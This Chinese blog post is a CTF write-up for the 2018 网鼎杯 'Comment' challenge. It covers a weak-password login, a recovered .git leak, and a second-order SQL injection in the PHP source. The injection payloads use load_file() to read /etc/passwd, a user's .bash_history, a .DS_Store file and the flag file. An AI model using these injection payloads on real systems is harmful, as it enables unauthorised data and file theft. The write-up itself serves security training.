[网鼎杯 2018]Comment

最新推荐文章于 2024-05-05 02:50:49 发布
最新推荐文章于 2024-05-05 02:50:49 发布
阅读量2.6k 收藏
点赞数 3
分类专栏: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SopRomeo/article/details/105874485
版权

这题目太顶了
进去随便发个贴,出现登录
在这里插入图片描述
已经提示用户名和密码了,弱密码登录(得自己去爆破)
zhangwei666即可

没啥思路,扫下目录试试,kali的dirb扫到.git泄露
githacker得到源码
看到这我懵了
在这里插入图片描述
看了web,这是一段残缺的代码,需要进行恢复
指令如下

git log --reflog

在这里插入图片描述

git reset --hard e5b2a2443c2b6d395d06960123142bc91123148c

得到完整源码

<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
    header("Location: ./login.php");
    die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
    $category = addslashes($_POST['category']);
    $title = addslashes($_POST['title']);
    $content = addslashes($_POST['content']);
    $sql = "insert into board
            set category = '$category',
                title = '$title',
                content = '$content'";
    $result = mysql_query($sql);
    header("Location: ./index.php");
    break;
case 'comment':
    $bo_id = addslashes($_POST['bo_id']);
    $sql = "select category from board where id='$bo_id'";
    $result = mysql_query($sql);
    $num = mysql_num_rows($result);
    if($num>0){
    $category = mysql_fetch_array($result)['category'];
    $content = addslashes($_POST['content']);
    $sql = "insert into comment
            set category = '$category',
                content = '$content',
                bo_id = '$bo_id'";
    $result = mysql_query($sql);
    }
    header("Location: ./comment.php?id=$bo_id");
    break;
default:
    header("Location: ./index.php");
}
}
else{
    header("Location: ./index.php");
}
?>

在这里插入图片描述
可以发现当do=write的时候,传入的信息都会进行转义,但是数据库会自动清除反斜杠,
在这里插入图片描述
当do=comment的时候,可以发现直接从category这个字段进行查询,这就导致了二次注入
所以说那个转义函数根本起不到防护的作用

二次注入讲解

通过下面的sql语句来进行注入
在这里插入图片描述
首先我们需要在界面看到sql注入后的回显

在这里插入图片描述
可以发现content这个变量最后会回显在我们的留言页面中,那么就通过他来输出我们的sql语句
然后闭合sql语句 由于内容太多了,采取/**/的批量注释方法,

payload

title=23&category=1',content=database(),/*&content=3123

再让content = */#

在这里插入图片描述
提交之后会爆出库名,emmmm我按照常规的注入不知道为啥没有任何回显,.看了wp
查看user
在这里插入图片描述

得知使用者是root权限
在这里插入图片描述

这样的话,一般 flag 就不会在数据库里面(因为如果在数据库中,不需要root权限)

所以sql注入读取本地文件 可以使用load_file()
玩过linux的都知道 /etc/passwd这里存储用户信息
paylaod

213',content=(select load_file('/etc/passwd')),/*

在这里插入图片描述
有个www用户
查看bash_history : 保存了当前用户使用过的历史命令,方便查找
在/home/www/下
paylaod

213',content=(select load_file('/home/www/.bash_history')),/*

在这里插入图片描述
看见他删除了 .DS_Store 文件,由于目标环境是docker,所以 .DS_Store 文件应该在 /tmp/html 中。而 .DS_Store 文件中,经常会有一些不可见的字符,可以使用hex函数对其进行16进制转换,

payload

213 ',content=(select hex(load_file("/tmp/html/.DS_Store"))),/*

出来一大窜16进制
在这里插入图片描述
放bp解码,flag在flag_8946e1f1ee3e40f.php
在这里插入图片描述

payload

213',content=(select hex(load_file('/var/www/html/flag_8946e1ff1ee3e40f.php'))),/*

解码得到flag
在这里插入图片描述

penson by 小乌
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
oracle comment命令用法示例分享
09-10
Oracle的`COMMENT ON`命令是数据库管理系统中用于添加元数据注释的重要工具,它允许数据库管理员或开发人员为表、列、操作符、索引类型、物化视图等对象添加描述性注释。这些注释有助于提高数据库的可读性和可维护性...
[网鼎杯 2018]Comment题解,超详细!
2202_75361164的博客
10-23 521
【代码】[网鼎杯 2018]Comment题解,超详细!思路加payload
[网鼎杯 2018]Comment(二次注入,git泄露,git恢复)
qq_45521281的博客
04-12 3102
进入题目是这样的 要发帖还必须登录 在这里已经给了你用户名并提示了密码;密码隐藏了后三位,我们可以用爆破爆破后面三位的方法: 由爆破状态码的密码后三位为666,登录进去就可以发帖了。接下来用dirsearch扫描,发现存在.git文件 那应该存在.git文件泄露,用GitHack下载发现有一个write_do.php,但是代码有缺失 查一下之前提交的版本,单独用git log不能全部显示,直...
2024全国职业技能大赛-网络安全赛题解析总结⑨(超详细)_2024网鼎杯网络安全大赛题库(1)
最新发布
2401_84240129的博客
05-05 994
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
[网鼎杯 2018]Comment -----不会编程的崽
不会编程的崽的博客
03-25 1064
网鼎杯 二次注入 Git泄露 弱口令
comment_css_flask-comment_
09-29
标题中的"comment_css_flask-comment_"表明这是一个与Python Flask框架相关的项目,主要涉及评论功能的实现,并且可能特别关注CSS(Cascading Style Sheets)在界面设计中的应用。Flask是一个轻量级的Web服务器网关...
powerdesigner,将name自动填充到注释(comment)。
08-10
在数据库建模过程中,为表、字段等对象添加注释(Comment)是十分重要的,因为它有助于增强代码的可读性和维护性。在PowerDesigner中,可以通过执行脚本来自动化一些重复性任务,例如将字段的名称(Name)自动填充到...
PowerDesigner 中name和comment 互换脚本
06-12
提供的两个脚本文件——"comment脚本赋值到PDM的name.vbs"和"name脚本赋值到PDM的comment.vbs",其功能分别是将当前对象的comment属性值赋给name,以及将name属性值赋给comment。这样的操作对于批量处理大量对象的...
mysqldocdump-comment-import-markdown
01-16
linux环境运行根据mysql的comment属性导出markdown格式的数据文档 ./mysqldocdump -u user -p xxxx -h 127.0.0.1 -D dbname -o db.md ./mysqldocdump -h markdown查看工具 推荐Typora
网鼎杯 白虎组.zip
05-15
2020年第二届 网鼎杯网络安全大赛白虎组 线下赛 真题 pwn reserve web misc 按照“网鼎杯”大赛两年一届的举办原则,第二届“网鼎杯”大赛5月开赛,6月19日至21日在广东省深圳市举办线下半决赛、总决赛和颁奖典礼。
网鼎杯密码题
05-01
网鼎杯密码题chaoyang.txt,加密方式暂不说,想知道解题流程可以讨论
BUUCTF之[网鼎杯 2018]Comment
m0_62107966的博客
09-15 914
BUUCTF之[网鼎杯 2018]Comment 输入:*/# sql语句是换行的,所以我们无法用 单行注释符,必须用/**/拼接,用#闭合sql语句使其执行。可以看到执行成功,返回ctf这个库。首先发帖的时候必须登录,爆破弱密码登录,得到666是满足的后三位密码的。是一个类似留言板的界面,考虑二次注入,并且有git源码泄露。接下来尝试sql语句注入都失败了,看了大佬的wp,用sql来读取文件。在cmment中,对于category的值从数据库取出来没有进行转义
2022网鼎杯青龙组密码wp
mxx307的博客
08-27 606
2022网鼎杯青龙组密码wp
XCTF:unfinish(2018网鼎杯)(SQL二次注入)
羽的博客
09-14 1033
见到这题,我就和上面的图片是一样的(很形象) 扫出个注册页面 简单fuzz,可以知道他过滤了逗号和information,没有逗号,就防止了报错注入,因为注册界面一般是insert语句。又把information这个SQL注入中重要的数据库过滤了。然后就很难。 正确思路应该是二次注入 当注册时用户名使用:1' and '0 当注册时用户名为:1' and '1 所以这里是存在二次注入的。 在mysql中,+只能当做运算符。 ...
第三届“网鼎杯”官方资格赛圆满结束,问鼎之战即将开启!
Sophya89的博客
09-02 843
8月31日,历时近一周的激烈博弈,第三届“网鼎杯”四场官方资格赛圆满结束。接下来,将遴选500支战队、2000名选手晋级半决赛,全球最大规模网络安全竞技现场即将开启!
网鼎杯2018 comment
weixin_44377940的博客
03-20 2077
本次知识点 git恢复文件 二次注入 git恢复文件 如何判断是否可以恢复? 看是否有commit文件,如果没有,则需要恢复,像这题: 可以看到,
sql COMMENT
09-12
SQL COMMENT 是用于在 SQL 查询或表中添加注释的语法。它可以帮助开发者和数据库管理员更好地理解和维护数据库对象。在 SQL 查询中,可以使用 COMMENT 关键字来添加注释,格式如下: ``` SELECT column_name FROM table_name COMMENT 'This is a comment'; ``` 在上面的例子中,可以在 SELECT 查询语句后面使用 COMMENT 关键字来添加注释说明查询的目的或其他相关信息。 另外,在创建或修改表结构时,也可以使用 COMMENT 关键字来为表、列或约束添加注释,示例如下: ``` CREATE TABLE table_name ( column1 datatype COMMENT 'Comment for column1', column2 datatype COMMENT 'Comment for column2' ); ALTER TABLE table_name MODIFY column_name datatype COMMENT 'This is a comment'; ``` 通过添加注释,可以提供更多的上下文信息,使得其他人更容易理解数据库结构和查询意图。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值